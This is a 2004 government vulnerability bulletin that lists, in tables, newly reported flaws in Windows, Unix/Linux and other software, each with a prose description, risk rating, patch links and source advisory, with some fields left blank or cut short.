Summary of Security Items from August 18 through August 31, 2004
The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.
Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:
- High: vulnerabilities with a CVSS base score of 7.0–10.0
- Medium: vulnerabilities with a CVSS base score of 4.0–6.9
- Low: vulnerabilities with a CVSS base score of 0.0–3.9
Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis.
This bulletin provides a summary of new or updated vulnerabilities, exploits, trends and viruses identified between August 18 and August 31, 2004. Updates to items appearing in previous bulletins are listed in bold text. The text in the Risk column appears in red for vulnerabilities ranking High. The Recent Exploit/Technique table contains a "Workaround or Patch Available" column that indicates whether a workaround or patch has been published for the vulnerability which the script exploits.
Bugs, Holes, & Patches
The table below summarizes vulnerabilities that have been identified, even if they are not being exploited. Complete details about patches or workarounds are available from the source of the information or from the URL provided in the section. CVE numbers are listed where applicable. Vulnerabilities that affect both Windows and Unix Operating Systems are included in the Multiple Operating Systems section.
Note: All the information included in the following tables has been discussed in newsgroups and on web sites.
Risk is defined as follows:
- High - A high-risk vulnerability is defined as one that will allow an intruder to immediately gain privileged access (e.g., sysadmin or root) to the system or allow an intruder to execute code or alter arbitrary system files. An example of a high-risk vulnerability is one that allows an unauthorized user to send a sequence of instructions to a machine and the machine responds with a command prompt with administrator privileges.
- Medium - A medium-risk vulnerability is defined as one that will allow an intruder immediate access to a system with less than privileged access. Such a vulnerability will allow the intruder the opportunity to continue the attempt to gain privileged access. An example of a medium-risk vulnerability is a server configuration error that allows an intruder to capture the password file.
- Low - A low-risk vulnerability is defined as one that will provide information to an intruder that could lead to further compromise attempts or a Denial of Service (DoS) attack. It should be noted that while the DoS attack is deemed low from a threat potential, the frequency of this type of attack is very high. DoS attacks against mission-critical nodes are not included in this rating and any attack of this nature should instead be considered to be a "High" threat.
Vendor & Software Name | Vulnerability - Impact / Patches - Workarounds / Attack Scripts | Common Name | Risk | Source |
--- | --- | --- | --- | --- |
aGSM 2.35 c | A buffer overflow vulnerability exists in the server information parsing routines for Half-Life game servers due to a boundary error when receiving No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | aGSM Half-Life Server Info Response Buffer Overflow | High | Secunia Advisory, SA12334, August 24, 2004 |
Internet Chat Server 1.61 | A remote Denial of Service vulnerability exists due to insufficient sanitization of user-supplied input. No workaround or patch available at time of publishing. An exploit script has been published. | Bird Chat Remote Denial of Service | Low | Securiteam, August 25, 2004 |
Access Control Server Solution Engine, Secure Access Control Server 3.2 (3), 3.2 (2), 3.2, Secure ACS for Windows Server 3.2 | Multiple vulnerabilities exist: a remote Denial of Service vulnerability exists in the web-based management interface (CSAdmin); a remote Denial of Service vulnerability exists when processing LEAP (Lightweight Extensible Authentication Protocol) authentication requests when the device is configured as a LEAP RADIUS proxy; a vulnerability exists when handling NDS (Novell Directory Services) users, which could let a remote malicious user bypass authentication; and a vulnerability exists in the ACS administration web services, which could let a remote malicious user bypass authentication. Workaround and patches available at: http://www.cisco.com/warp/public/707/cisco-sa-20040825-acs.shtml There is no exploit code required. | Secure Access Control Server Multiple Remote Vulnerabilities | Low/Medium (Medium if authentication can be bypassed) | Cisco Security Advisory, 61603, August 25, 2004 |
Easy File Sharing Web Server 1.2, 1.25 | Several vulnerabilities exist: a vulnerability exists due to insufficient restrictions on the web server's virtual folders, which could let a remote malicious user obtain sensitive information; and a remote Denial of Service vulnerability exists when a malicious user submits several large HTTP requests. No workaround or patch available at time of publishing. There is no exploit code required. | Easy File Sharing Web Server Information Disclosure & Remote Denial of Service | Low/Medium (Medium if sensitive information can be obtained) | GulfTech Security Research Advisory, August 24, 2004 |
Gadu-Gadu Instant Messenger 6.0 | A vulnerability exists because a link can be created with a specially crafted filename, which could let a remote malicious user send a file with a spoofed file extension. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Gadu-Gadu Spoofed File Extension | Medium | SecurityTracker Alert ID, 1011037, August 24, 2004 |
WhatsUp Gold 7.0 4, 7.0 3, 7.0, 8.0 3, 8.0 1, 8.0 | A buffer overflow vulnerability exists in the '_maincfgret.cgi' script due to a failure to validate user-supplied string lengths, which could let a remote malicious user execute arbitrary code. Upgrades available at: We are not aware of any exploits for this vulnerability. | WhatsUp Gold Remote Buffer Overflow CVE Name: CAN-2004-0798 | High | iDEFENSE Security Advisory, August 25, 2004 |
Keene Digital Media Server 1.0.2 | A Directory Traversal vulnerability exists when files are requested outside of the webroot of the application using hex encoded character sequences, which could let a remote malicious user obtain sensitive information. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Keene Digital Media Server Directory Traversal | Medium | Securiteam, August 30, 2004 |
Ground Control II 1.0 .0.7 | A remote Denial of Service vulnerability exists when a game client or server receives a packet larger than 512 bytes. No workaround or patch available at time of publishing. Proof of Concept exploit script has been published. | Ground Control II Remote Denial of Service | Low | Securiteam, August 30, 2004 |
Merak Mail Server 7.4.5 | Multiple vulnerabilities exist: several Cross-Site Scripting vulnerabilities exist due to insufficient validation of user-supplied input in a number of variables, which could let a remote malicious user execute arbitrary HTML and script code; a vulnerability exists because specially crafted HTML can be injected directly into a message or included in the subject field, which could let a remote malicious user execute arbitrary code; a vulnerability exists in 'adress.html' or 'calendar.html' when a remote malicious user submits specially crafted parameters which results in the disclosure of sensitive information; a vulnerability exists because a remote malicious user can download any file with a '.php' extension which results in the disclosure of sensitive information; and a vulnerability exists in 'calendar.html' because a remote malicious user can inject SQL commands. Upgrade available at: There is no exploit code required; however, Proofs of Concept exploits have been published. | Merak Mail Server Webmail Multiple Vulnerabilities | Medium/High (High if arbitrary code can be executed) | Securiteam, August 19, 2004 |
Internet Explorer 5.0, 6.0, SP1 | A vulnerability exists because an IFRAME that is accessible in the same domain may be used to change the URI to the location of a file or directory, which could let a malicious user obtain sensitive information. No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | Internet Explorer Resource Detection | Medium | Bugtraq, August 24, 2004 |
Internet Explorer 5.5 SP1 & SP2, 6.0, SP1 | A vulnerability exists due to insufficient validation of drag and drop events issued from the 'Internet' zone, which could let a malicious user execute arbitrary code. No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | Internet Explorer Drag & Drop File Installation | High | Secunia Advisory, SA12321, August 19, 2004 |
Internet Explorer 6.0 SP1 | A cross security domain script vulnerability exists when a malicious MHTML file is submitted, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. Proof of Concept exploit script has been published. | Internet Explorer MHTML Content-Location Cross Security Domain Scripting | High | Bugtraq, August 19, 2004 |
Outlook Express 6.0, SP1 | A vulnerability exists in the 'bcc:' field due to an error when sending multipart Hotfix available at: http://support.microsoft.com/default.aspx?scid=kb;EN-US;843555 There is no exploit code required. | Outlook Express BCC Field Information Disclosure | Medium | Secunia Advisory, SA12376, August 25, 2004 |
Small Business Server 2000, 2003, Windows 2000 Advanced Server, SP1-SP4, 2000 Datacenter Server, SP1-SP4, 2000 Professional, SP1-SP4, 2000 Server, SP1-SP4, 2000 Server Japanese Edition, 2003 Datacenter Edition, 64-bit, | A time spoofing vulnerability exists in the Network Time Protocol (NTP) implementation because the time on the domain controller can be altered, which could let a remote malicious user cause a Denial of Service and possibly other attacks. Microsoft has released a knowledge base article (884776) describing methods of mitigation. This article recommends that a hardware time source be used on the authoritative time server, instead of an unauthenticated network time source. We are not aware of any exploits for this vulnerability. | Microsoft NTP Time Synchronization Spoof | Low | SecurityFocus, August 19, 2004 |
Gaucho 1.4 build 145 | A buffer overflow vulnerability exists in the 'Content-Type:' header due to insufficient validation, which could let a remote malicious user execute arbitrary code. Upgrade available at: http://homepage1.nifty.com/nakedsoft/Gaucho/G-14B151.zip Proof of Concept exploit script has been published. | Gaucho POP3 Email Header Buffer Overflow | High | SIG^2 Vulnerability Research Advisory, August 23, 2004 |
Web Log Analyzer 1.6 | A Cross-Site Scripting vulnerability exists in the 'user-agent' and 'referer' fields due to insufficient validation of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Web Log Analyzer Cross-Site Scripting | High | SecurityTracker 1011010, August 21, 2004 |
Winamp 2.4, 2.5 e, 2.5 E, 2.6 4, 2.10, 2.24, 2.50, 2.60 (lite), 2.60 (full), 2.61 (full), 2.62 (standard), 2.64 (standard), 2.65, 2.70 (full), 2.70, 2.71-2.81, 2.91, 3.0, 3.1, 5.0 1- 5.04 | A vulnerability exists due to insufficient restrictions on Winamp skin zip files (.wsz), which could let a remote malicious user execute arbitrary code. Upgrades available at: http://www.winamp.com/player/ This issue is known to be exploited in the wild and a Proof of Concept exploit has been published. | Winamp Skin File Remote Code Execution | High | Bugtraq, August 26, 2004 |
Integrity Protection Driver 1.2, 1.3, 1.4 | A Denial of Service vulnerability exists due to improper validation of some pointer references in some of the application's kernel hooks. No workaround or patch available at time of publishing. We are not aware of any exploits for this vulnerability. | Integrity Protection Driver Local Denial of Service | Low | Next Generation Security Technologies Security Advisory, NGSEC-2004-6, August 14, 2004 |
Painkiller 1.3.1 | A buffer overflow vulnerability exists due to insufficient boundary checking when processing a password supplied by a client during the connection No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | Painkiller Remote Buffer Overflow | Low/High (High if arbitrary code can be executed) | Securiteam, August 29, 2004 |
RealVNC 4.0 | A remote Denial of Service vulnerability exists when a malicious user establishes a large amount of connections. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | RealVNC Server Remote Denial of Service | Low | SecurityTracker Alert ID: 1011072, August 26, 2004 |
Regmon 6.11 | A Denial of Service vulnerability exists due to insufficient validation of some argument pointers. No workaround or patch available at time of publishing. A Proof of Concept exploit script has been published. | Regmon Local Denial of Service | Low | Next Generation Security Technologies Security Advisory, NGSEC-2004-7, August 14, 2004 |
Window Washer 5.5 | A vulnerability exists in the 'Add Bleach to Wash' function because the content of erased files is not properly overwritten, which could let a malicious user modify system information. No workaround or patch available at time of publishing. There is no exploit code required. | Webroot Window Washer Erased Files | Medium | Secunia Advisory, SA12380, August 26, 2004 |
BadBlue 2.5 | A remote Denial of Service vulnerability exists when processing multiple connections. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit script has been published. | BadBlue Webserver Denial of Service | Low | GulfTech Security Research Advisory, August 18, 2004 |
ZoneAlarm 2.1-2.6, 3.0, 3.1, 3.7.202, 4.0, 4.5.538.001, ZoneAlarm for Windows 95 1.0, 2.2-2.6, ZoneAlarm for Windows 98 2.1-2.6, ZoneAlarm For Windows NT 4.0 2.1-4.0 2.6, ZoneAlarm for Windows XP 2.6, ZoneAlarm Plus 4.0, 4.5.538.001, ZoneAlarm Pro 2.4, 2.6, 3.0, 3.1, 4.0, 4.5.538.001, 4.5, 5.0.590.015 | A vulnerability exists due to weak default permissions in the folder used to store log and configuration files, which could let a malicious user delete log entries in order to hide malicious activities. No workaround or patch available at time of publishing. There is no exploit code required. | ZoneAlarm/ZoneAlarm Pro Weak Default Permissions | Medium | Bugtraq, August 20, 2004 |
UNIX / Linux Operating Systems Only | ||||
Vendor & Software Name | Vulnerability - Impact / Patches - Workarounds / Attack Scripts | Common Name | Risk | Source |
--- | --- | --- | --- | --- |
Adobe Acrobat Reader 5.05 and 5.06 | An input validation and boundary error vulnerability exists in the uudecoding feature of Adobe Acrobat Reader, which can be exploited by a malicious user to compromise a user's system. The input validation error can be exploited to inject arbitrary shell commands. The boundary vulnerability can be exploited to cause a buffer overflow via a malicious PDF document with an overly long filename. Successful exploitation may allow execution of arbitrary code, but requires that a user is tricked into opening a malicious document. Update to version 5.09 for UNIX available at: http://www.adobe.com/products/acrobat/readstep2.html Gentoo: http://security.gentoo.org/glsa/glsa-200408-14.xml RedHat: http://rhn.redhat.com/errata/RHSA-2004-432.html We are not aware of any exploits for this vulnerability. | Adobe Acrobat Reader Shell Command Injection and Buffer Overflow Vulnerability CVE Names: | High | Secunia, SA12285, August 13, 2004; iDEFENSE Advisories 08.12.04; Gentoo Linux Security Advisory GLSA 200408-14, August 15, 2004; RedHat Security Advisory, RHSA-2004:432-08, August 26, 2004 |
PlaySMS 0.6, 0.7 | An input validation vulnerability exists in the 'valid()' function if the 'magic_quotes_gpc' setting is set to 'Off' due to insufficient verification, which could let a remote malicious user execute arbitrary SQL commands. Upgrades available at: Proof of Concept exploit script has been published. | PlaySMS SQL Input Validation | High | Securiteam, August 18, 2004 |
OS X Safari | A vulnerability exists in the 'Show in Finder' option, which could let a malicious user execute arbitrary code. Update available at: We are not aware of any exploits for this vulnerability. | Mac OS X Safari 'Show in Finder' CVE Name: | High | US-CERT Vulnerability Note VU#773190, August 24, 2004 |
MySQL Backup Pro 1.0.5-1.0.7 | A vulnerability exists in the 'getbackup()' function, which could let a remote malicious user obtain sensitive information. Upgrades available at: We are not aware of any exploits for this vulnerability. | MySQL Backup Pro Information Disclosure | Medium | SecurityFocus, August 20, 2004 |
Gallery 1.4.4 | A vulnerability exists in the 'set_time_limit' function due to insufficient validation of user-supplied input, which could let a remote malicious user execute arbitrary code. Upgrade available at: http://prdownloads.sourceforge.net/gallery/ Proof of Concept exploit has been published. | Gallery Input Validation | High | SecurityTracker Alert ID: 1010971, August 18, 2004 |
SARA | A remote buffer overflow vulnerability exists due to insufficient sanitization of user-supplied data, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | SARA Remote Buffer Overflow | High | Bugtraq, August 20, 2004 |
Inter7 Courier-IMAP 1.6, 1.7, 2.0.0, 2.1-2.1.2, 2.2.0, 2.2.1 | A format string vulnerability exists in the 'auth_debug()' function used for login debugging, which could let a remote malicious user execute arbitrary code. Upgrade available at: http://prdownloads.sourceforge.net/courier/courier-imap-3.0.7.tar.bz2 Gentoo: http://security.gentoo.org/glsa/glsa-200408-19.xml Trustix: ftp://ftp.trustix.org/pub/trustix/updates/ We are not aware of any exploits for this vulnerability. | Courier-IMAP Remote Format String CVE Name: | High | iDEFENSE Security Advisory 08.18.04 |
Hafiye 1.0 | A vulnerability exists due to insufficient filtering when a packet payload is displayed, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. We are not aware of any exploits for this vulnerability. | Hafiye Terminal Escape Sequence | High | SecurityFocus, August 23, 2004 |
FIDOGATE 4.4.5-4.4.7, 4.4.9 | An input validation vulnerability exists in '/src/common/log.c' which could let a malicious user obtain elevated privileges. Upgrades available at: http://prdownloads.sourceforge.net/ There is no exploit code required. | FIDOGATE Input Validation | Medium | SecurityTracker Alert ID: 1011021, August 23, 2004 |
Gentoo | Multiple vulnerabilities were reported in Gaim in the processing of the MSN protocol. A remote user may be able to execute arbitrary code on the target system. Several remotely exploitable buffer overflows were reported in the MSN protocol parsing functions. Gentoo: http://security.gentoo.org/glsa/glsa-200408-12.xml SuSE: http://www.suse.de/de/security/2004_25_gaim.html Mandrake: http://www.mandrakesecure.net/en/ftp.php Rob Flynn: Slackware: We are not aware of any exploits for this vulnerability. | Gaim Buffer Overflows in Processing MSN Protocol CVE Name: | High | SecurityTracker, 1010872, August 5, 2004; Mandrakelinux Security Update Advisory, MDKSA-2004:081, August 13, 2004; Slackware Security Advisory, SSA:2004-239-01, August 26, 2004 |
a2ps 4.13 | A vulnerability exists in filenames due to insufficient validation of shell escape characters, which could let a malicious user execute arbitrary commands. There is no exploit code required; however, a Proof of Concept exploit has been published. | GNU a2ps Command Injection | High | Securiteam, August 29, 2004 |
Job Management Partner-1 6 & 7 | Multiple vulnerabilities exist: a vulnerability exists in the login authentication procedure, which could let a malicious user obtain unauthorized access; and a remote Denial of Service vulnerability exists when a malicious user submits a specially crafted reset packet. Upgrades available at: http://www.hitachi-support.com/security_e/ We are not aware of any exploits for this vulnerability. | Hitachi Job Management Partner 1 Authentication Flaw & Remote Denial of Service | Low/Medium (Medium if unauthorized access can be obtained) | HS04-004-01 & HS04-005-01, August 23, 2004 |
IMWheel 1.0 pre11 | A vulnerability exists due to a race condition and insecure No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | IMWheel Insecure File Creation | Low/Medium (Medium if elevated privileges can be obtained) | Computer Academic Underground Security Advisory, CAU-2004-0002, August 26, 2004 |
sredird 1.0, 1.1.6-1.1.8, 2.0, 2.1, 2.2, 2.2.1 | Two vulnerabilities exist: a format string vulnerability exists in the 'LogMsg()' function due to insufficient sanitization, which could let a remote malicious user execute arbitrary code; and a buffer overflow vulnerability exists in the 'HandleCPCCommand()' function due to insufficient sanitization, which could let a remote malicious user execute arbitrary code. Upgrade available at: We are not aware of any exploits for this vulnerability. | SERCD, SREDIRD Format String & Buffer Overflow | High | SecurityTracker Alert ID: 1011038, August 24, 2004 |
Ulog-php 0.8, 0.8.1 | An input validation vulnerability exists in 'port.php' due to insufficient validation of the 'proto' parameter, which could let a remote malicious user execute arbitrary SQL commands. Upgrades available at: http://www.inl.fr/download/ulog-php-0.8.2.tar.gz There is no exploit code required. | Ulog-php Input Validation | High | SecurityFocus, August 23, 2004 |
vpopmail (vchkpw) 3.4.1-3.4.11, 4.5, 4.6, 4.7, 4.8, 4.9, 4.9.10, 4.10, 5.2.1, 5.2.2, 5.3.20-5.3.30, 5.4-5.4.2 | Multiple buffer overflow and format string vulnerabilities exist in the 'vsybase.c' file, which could let a malicious user cause a Denial of Service, obtain unauthorized access, or execute arbitrary code. Upgrades available at: We are not aware of any exploits for this vulnerability. | Inter7 Vpopmail Vsybase.c Multiple Vulnerabilities | Low/Medium/High (Low if a DoS; Medium if unauthorized access can be obtained; High if arbitrary code can be executed) | Bugtraq, August 17, 2004 |
vpopmail (vchkpw) 3.4.1-3.4.11, 4.5-4.10, 5.2.1, 5.2.2, 5.3.20-5.3.30, 5.4-5.4.5 | An SQL injection vulnerability exists due to insufficient sanitization of user-supplied input data before using it in an SQL query, which could let a remote malicious user insert additional SQL commands into data passed into POP/IMAP login, SMTP AUTH, or a QmailAdmin login. Note: Vpopmail is only vulnerable if SQL servers are utilized by the application. Sites using the 'cdb' backend for data storage are not affected. Upgrades available at: There is no exploit code required. | Vpopmail SQL Injection | Medium | SecurityFocus, August 20, 2004 |
XV 3.10a | Multiple vulnerabilities exist: a buffer overflow vulnerability exists in the 'xvbmp.c' source file, which could let a remote malicious user execute arbitrary code; multiple heap overflow vulnerabilities exist in the 'xviris.c' source file due to integer handling problems, which could let a remote malicious user execute arbitrary code; a heap overflow vulnerability exists in the 'xvpcx.c' source file due to integer handling problems, which could let a remote malicious user execute arbitrary code; and a heap overflow vulnerability exists in the 'xvpm.c' source file due to integer handling problems, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. Exploit script has been published. | XV Multiple Buffer Overflow and Integer Handling | High | Bugtraq, August 24, 2004 |
Linux kernel 2.4 through 2.4.26, 2.6 through 2.6.7 | A vulnerability exists in the Linux kernel in the processing of 64-bit file offset pointers thus allowing a local malicious user to view kernel memory. The kernel's file handling API does not properly convert 64-bit file offsets to 32-bit file offsets. In addition, the kernel provides insecure access to the file offset member variable. As a result, a local user can gain read access to large portions of kernel memory. Fedora: http://download.fedora.redhat.com/pub/fedora/linux/core/updates/2/ RedHat: http://rhn.redhat.com/ SuSE: http://www.suse.de/de/security/2004_24_kernel.html Gentoo: http://security.gentoo.org/glsa/glsa-200408-24.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php SGI: ftp://patches.sgi.com/support/free/security/patches/ProPack/3/ Trustix: ftp://ftp.trustix.org/pub/trustix/updates/ A Proof of Concept exploit script has been published. | Linux Kernel 64-bit to 32-bit File Offset Conversion Errors Disclose Kernel Memory to Local Users CVE Name: | High | ISEC Security Research, August 4, 2004; SGI Security Advisory, 20040804-01-U, August 26, 2004; Gentoo Linux Security Advisory GLSA 200408-24, August 25, 2004; Mandrakelinux Security Update Advisory, August 26, 2004; Trustix Secure Linux Security Advisory, TSLSA-2004-0041, August 9, 2004 |
RXVT-Unicode 3.4, 3.5 | A vulnerability exists due to a failure to properly close file descriptors when spawning new child terminal windows, which could let a malicious user obtain sensitive information. Update available at: There is no exploit code required. | RXVT-Unicode Open File Descriptor Leakage | Medium | Secunia Advisory, SA1229, August 16, 2004 |
FileZilla Server 0.7, 0.7.1; OpenBSD -current, 3.5 | A remote Denial of Service vulnerability during the decompression process exists due to a failure to handle malformed input. Gentoo: http://security.gentoo.org/glsa/glsa-200408-26.xml FileZilla: http://sourceforge.net/project/showfiles.php?group_id=21558 OpenBSD: OpenPKG: ftp://ftp.openpkg.org Trustix: ftp://ftp.trustix.org/pub/trustix/updates/ We are not aware of any exploits for this vulnerability. | Zlib Compression Library Remote Denial of Service CVE Name: | Low | SecurityFocus, August 25, 2004 |
Gentoo Linux 0.5, 0.7, 1.1 a, 1.2, 1.4, rc1-rc3; GNU glibc 2.0-2.0.6, 2.1, 2.1.1-6, 2.1.1, 2.1.2, 2.1.2-10, 2.1.3, 2.1.9 & greater, 2.2-2.2.5, 2.3-2.3.4 | A vulnerability exists in 'LD_DEBUG' on set user id (setuid) binaries, which could let a malicious user obtain sensitive information. Gentoo: http://security.gentoo.org/glsa/glsa-200408-16.xml We are not aware of any exploits for this vulnerability. | GLibC LD_DEBUG Information Disclosure | Medium | Gentoo Linux Security Advisory GLSA 200408-16, August 16, 2004 |
Gentoo Linux 1.4 | Multiple vulnerabilities exist: a buffer overflow vulnerability exists in the 'read_dib()' function when handling 8-bit RLE encoded BMP files, which could let a malicious user execute arbitrary code; and buffer overflow vulnerabilities exist in the XPM, GIF, and JPEG image file handlers, which could let a remote malicious user execute arbitrary code. Debian: http://security.debian.org/pool/updates/main/q/qt-copy/ Fedora: http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-20.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php Slackware: ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/kde/qt-3.1.2-i486-4.tgz SuSE: ftp://ftp.suse.com/pub/suse/i386/update Trolltech Upgrade: http://www.trolltech.com/download/index.html TurboLinux: ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/ Proof of Concept exploit has been published. | Qt Image File Buffer Overflows CVE Names: | High | Secunia Advisory, SA12325, August 10, 2004 |
Gentoo Linux 1.4; | A vulnerability exists while validating cookie domains, which could let a remote malicious user hijack a target user's session. KDE: ftp://ftp.kde.org/pub/kde/security_patches Gentoo: http://security.gentoo.org/glsa/glsa-200408-23.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php There is no exploit code required. | KDE Konqueror Cookie Domain Validation CVE Name: | Medium | KDE Security Advisory, August 23, 2004 |
Gentoo Linux 1.4 | A vulnerability exists due to insufficient validation of ownership of temporary directories, which could let a malicious user cause a Denial of Service, overwrite arbitrary files, or obtain elevated privileges. KDE: ftp://ftp.kde.org/pub/kde/security_patches/post-3.0.5b-kdelibs-kstandarddirs.patch Debian: http://security.debian.org/pool/updates/main/k/kdelibs/ Gentoo: http://security.gentoo.org/glsa/glsa-200408-13.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php There is no exploit code required. | KDE Insecure Temporary Directory Symlink CVE Name: | Low/Medium (Low if a DoS) | KDE Security Advisory, August 11, 2004 |
Gentoo Linux 1.4 | A vulnerability exists in DCOPServer due to insecure file creation, which could let a malicious user obtain elevated privileges or overwrite arbitrary files. KDE: ftp://ftp.kde.org/pub/kde/security_patches/post-3.2.3-kdelibs-dcopserver.patch Gentoo: http://security.gentoo.org/glsa/glsa-200408-13.xml Mandrake: http://www.mandrakesecure.net/en/ftp.php There is no exploit code required. | KDE DCOPServer Insecure Temporary File Creation CVE Name: | Medium | KDE Security Advisory, August 11, 2004 |
KDE 3.2.3 and prior | A frame injection vulnerability exists in the Konqueror web browser that allows websites to load web pages into a frame of any other frame-based web page that the user may have open. A malicious website could abuse Konqueror to insert its own frames into the page of an otherwise trusted website. As a result the user may unknowingly send confidential information intended for the trusted website to the malicious website. Source code patches have been made available which fix these vulnerabilities. Refer to advisory: http://www.kde.org/info/security/advisory-20040811-3.txt Mandrake: http://www.mandrakesecure.net/en/ftp.php A Proof of Concept exploit has been published. | Konqueror Frame Injection Vulnerability CVE Name: | Low | KDE Security Advisory 20040811-3, August 11, 2004 Mandrakelinux Security Update Advisory, MDKSA-2004:086, August 21, 2004 |
Linux kernel 2.4.0-test1-test9, | A race condition vulnerability exists when a process is spawning, which could let a malicious user obtain sensitive information. Gentoo: http://security.gentoo.org/glsa/glsa-200408-24.xml We are not aware of any exploits for this vulnerability. | Linux Kernel Race Condition | Medium | Gentoo Linux Security Advisory, GLSA 200408-24, August 25, 2004 |
Luke Mewburn lukemftp 1.5, TNFTPD 20031217; NetBSD Current, 1.3-1.3.3, 1.4 x86, 1.4, SPARC, arm32, Alpha, 1.4.1 x86, 1.4.1, SPARC, sh3, arm32, Alpha, 1.4.2 x86, 1.4.2, SPARC, arm32, Alpha, 1.4.3, 1.5 x86, 1.5, sh3, 1.5.1-1.5.3, 1.6, beta, 1.6-1.6.2, 2.0 | Several vulnerabilities exist in the out-of-band signal handling code due to race condition errors, which could let a remote malicious user obtain superuser privileges. Luke Mewburn Upgrade: We are not aware of any exploits for this vulnerability. | TNFTPD Multiple Signal Handler Remote Privilege Escalation | High | NetBSD Security Advisory 2004-009, August 17, 2004 |
Mozilla Browser 1.7.2, | A vulnerability exists when the browser is configured to employ the 'Tabbed Browsing' functionality, which could let a remote malicious user conduct phishing attacks. No workaround or patch available at time of publishing. Proof of Concept exploit has been published. | Mozilla/Netscape/Firefox Browsers Content Spoofing | Medium | Bugtraq, August 26, 2004 |
Music daemon 0.1-0.3 | A vulnerability exists due to insufficient authentication of user-supplied commands, which could let a remote malicious user obtain sensitive information or cause a Denial of Service. No workaround or patch available at time of publishing. An exploit script has been published. | Music Daemon Information Disclosure | Low/Medium (Medium if sensitive information can be obtained) | Securiteam, August 26, 2004 |
MySQL 3.20.x, 3.20.32a, 3.21.x, 3.22.x, 3.22.26-3.22.30, 3.22.32, 3.23.x, 3.23.2-3.23.5, 3.23.8-3.23.10, 3.23.22-3.23.34, 3.23.36-3.23.56, 3.23.58, 4.0.0-4.0.15, 4.0.18, 4.0.20, 4.1.0-alpha, 4.1.0-0, 4.1.2-alpha, 4.1.3-beta, 4.1.3-0, 5.0.0-alpha, 5.0.0-0 | A buffer overflow vulnerability exists in the 'mysql_real_connect' function due to insufficient boundary checking, which could let a remote malicious user cause a Denial of Service and possibly execute arbitrary code. Note: Computers using glibc on Linux and BSD platforms may not be vulnerable to this issue. No workaround or patch available at time of publishing. We are not aware of any exploits for this vulnerability. | MySQL Mysql_real_connect Function Remote Buffer Overflow | High/Low (Low if a DoS) | Secunia Advisory, SA12305, August 20, 2004 |
MySQL 3.23.49, 4.0.20 | A vulnerability exists in the 'mysqlhotcopy' script due to predictable file names of temporary files, which could let a malicious user obtain elevated privileges. Debian: http://security.debian.org/pool/updates/main/m/ There is no exploit code required. | Medium | Debian Security Advisory, DSA 540-1, August 18, 2004 | |
OpenBSD 3.2-3.5 | A Denial of Service vulnerability exists in the implementation of bridging in OpenBSD due to insufficient validation of ICMP packets. Patches available at: ftp://ftp.openbsd.org/pub/OpenBSD/patches/ There is no exploit code required. | OpenBSD Bridged Network ICMP Denial of Service | Low | Bugtraq, August 25, 2004 |
OpenBSD -current, 3.3, 3.4 | Multiple remote Denial of Service vulnerabilities exist when processing certain malformed payloads. Patches available at: ftp://ftp.openbsd.org/pub/OpenBSD/patches/ We are not aware of any exploits for this vulnerability. | OpenBSD isakmpd Multiple Unspecified Remote Denial of Service CVE Names: | Low | SecurityFocus, March 23, 2004 US-CERT Vulnerability Notes VU#223273, VU#349113, VU#524497, VU#785945, VU#996177, August 27, 2004 |
PHP Code Snippet Library 0.8 | Multiple Cross-Site Scripting vulnerabilities exist in 'index.php' due to insufficient sanitization of the 'cat_select' and 'show' parameters, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. Proofs of Concept exploits have been published. | PHP Code Snippet Library Multiple Cross-Site Scripting | High | Secunia Advisory, SA12370, August 25, 2004 |
Cacti 0.5, 0.6-0.6.8, 0.8-0.8.5; Gentoo Linux 1.4 | A vulnerability exists in the 'auth_login.php' script due to insufficient validation of user-supplied input in the username or password fields, which could let a remote malicious user bypass the authentication interface. The vendor has issued a fix, available via CVS. Gentoo: http://security.gentoo.org/glsa/glsa-200408-21.xml Proofs of Concept exploits have been published. | RaXnet Cacti Auth_Login.PHP Authentication Bypass | Medium | SecurityTracker Alert ID: 1010961, August 17, 2004 |
